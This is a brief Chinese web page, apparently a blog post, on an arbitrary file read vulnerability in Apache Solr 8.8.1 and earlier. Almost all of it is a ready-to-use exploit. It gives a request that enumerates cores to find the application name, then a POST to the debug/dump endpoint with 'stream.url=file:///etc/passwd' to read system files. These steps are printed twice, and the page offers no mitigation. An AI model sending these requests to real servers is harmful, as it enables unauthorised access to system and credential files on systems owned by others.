Apache Solr 存在任意文件读取
影响范围
Apache Solr <= 8.8.1
访问连接确认漏洞存在,并获取应用名
http://example.com/solr/admin/cores?indexInfo=false&wt=json
提交POST请求,触发漏洞
http://example.com/solr/应用名/debug/dump?param=ContentStreams
POST:
stream.url=file:///etc/passwd
Apache Solr <= 8.8.1
http://example.com/solr/admin/cores?indexInfo=false&wt=json
http://example.com/solr/应用名/debug/dump?param=ContentStreams
POST:
stream.url=file:///etc/passwd
浙公网安备 33010602011771号